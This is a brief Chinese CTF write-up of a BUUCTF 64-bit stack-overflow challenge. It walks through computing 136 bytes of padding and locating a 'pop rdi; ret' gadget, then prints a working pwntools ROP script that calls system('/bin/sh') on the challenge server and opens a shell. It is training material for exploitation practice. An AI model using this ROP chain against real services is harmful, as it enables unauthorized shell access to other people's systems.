64 位 ROP!!!

64 位 ROP

话不多说，直接上题（BUUCTF）

扔进 IDA64 中反编译，发现调用了一个函数，进去看看

缓存区 buf 大小居然为 200，肯定存在溢出

双击 buf 可以算出需要 136 个字节垃圾数据

没有给后门函数，但是给了相关字符串，需要构造 ROP

64 位系统还格外需要一个 pop rdi; ret 指令，使用工具 ROPgadget 获取其地址

pop rdi; ret 是一个非常常见的 ROP gadget，它的作用是将栈上的一个值弹出并放入 rdi 寄存器中，然后执行 ret 跳转到下一个指令

构造 payload，pop rdi 在前，参数在函数前面

对于64位的Linux系统，函数的参数是这样传递的：

• rdi: 第一个参数

• rsi: 第二个参数

• rdx: 第三个参数

• rcx: 第四个参数

• r8: 第五个参数

• r9: 第六个参数

如果参数个数超过6个，那么剩余的参数会被推入栈中

from pwn import *
​
p = remote("node5.buuoj.cn",28172)
​
binsh = 0x0600A90
sys_addr = 0x0400603
pop_rdi = 0x04006b3
​
payload = b'a' * 136 + p64(pop_rdi) + p64(binsh) + p64(sys_addr)
​
p.sendline(payload)
p.interactive()

成功拿到 flag